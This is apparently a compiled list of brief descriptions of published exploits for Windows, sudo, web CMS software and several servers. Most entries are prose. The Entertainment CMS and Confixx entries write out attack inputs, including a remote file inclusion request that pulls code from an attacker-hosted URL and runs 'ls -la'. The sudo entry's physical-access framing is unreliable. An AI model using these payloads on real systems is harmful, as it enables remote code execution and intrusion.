The generic exception dispatching code present in the Windows kernel discloses portions of uninitialized kernel stack memory to user-mode clients via the CONTEXT structure set up for the ring-3 exception handlers.
This is an exploit for a stack overflow vulnerability in http://rshd.sourceforge.net. It took about 35 minutes to find the bug and exploit it on Win2k3 using the information provided by WabiSabiLabi.
The exploit is related to the index.php file. The exact vulnerability is not mentioned.
This exploit allows an attacker to execute commands remotely on the target system by exploiting a vulnerability in the Entertainment CMS custom.php file. The vulnerability can be exploited by appending a local file inclusion payload to the 'pagename' parameter in the URL. The exploit URL format is 'http://site.com/[path]/custom.php?pagename=[Local File Inclusion]'. The exploit was coded by Kw3rLn from the Romanian Security Team (RST) and the contact email is office@rstzone.org. More information about the exploit can be found at http://securityreason.com/securityalert/2878.
This exploit allows remote attackers to execute arbitrary code on a vulnerable Painkiller game server. The vulnerability exists due to a code execution bug in the Painkiller game server. By sending a specially crafted packet to the server, an attacker can control the code flow and execute arbitrary code.
The Confixx PRO version 3.3.1 is vulnerable to remote file inclusion. An attacker can access the file saveserver.php without authentication. The vulnerability exists due to the variable $thisdir not being defined in the code. By exploiting this vulnerability, an attacker can execute arbitrary commands on the target system. The conditions for exploitation are that the open_basedir restriction is turned off and allow_url_fopen is set to on. The attacker can send a POST request or a GET request to the saveserver.php file with the parameter thisdir set to a malicious URL that includes the command to be executed. For example, the attacker can send a POST request with thisdir set to http://[yoursite]/images/1.jpg?&cmd=ls -la or a GET request with saveserver.php?thisdir=http://[yoursite]/images/1.jpg?&cmd=ls -la.
This exploit targets Easy File Sharing Web Server version 7.2 and utilizes a buffer overflow vulnerability in the 'POST' request. It bypasses DEP (Data Execution Prevention) using ROP (Return-Oriented Programming) techniques. The exploit is written in Python and uses a crafted shellcode to execute arbitrary commands.
This exploit allows an attacker with physical access to a system to gain root privileges by exploiting a vulnerability in the sudo program. By creating a large number of pseudo-terminals (pts), the attacker can overflow a buffer in the sudo program and execute arbitrary code with root privileges. The vulnerability was reported by Qualys, Inc. and assigned CVE-2017-1000367.
The exploit takes advantage of a memory corruption vulnerability in the JavaScript engine to achieve arbitrary code execution. By creating a specially crafted object and manipulating its properties, the exploit is able to overwrite memory and execute arbitrary code. This vulnerability was demonstrated at the Pwnfest 2016 hacking competition.
This exploit takes advantage of a buffer overflow vulnerability in the 'Enter User Name' field of Easy MOV Converter version 1.4.24. By pasting a specially crafted payload into this field, an attacker can overwrite the Structured Exception Handler (SEH) and gain control over the program's execution flow. The exploit uses a combination of a long string of 'A' characters, a short jump instruction, and a return address to redirect execution to the attacker's code. The payload included in this exploit launches the Windows calculator (calc.exe) as a proof of concept.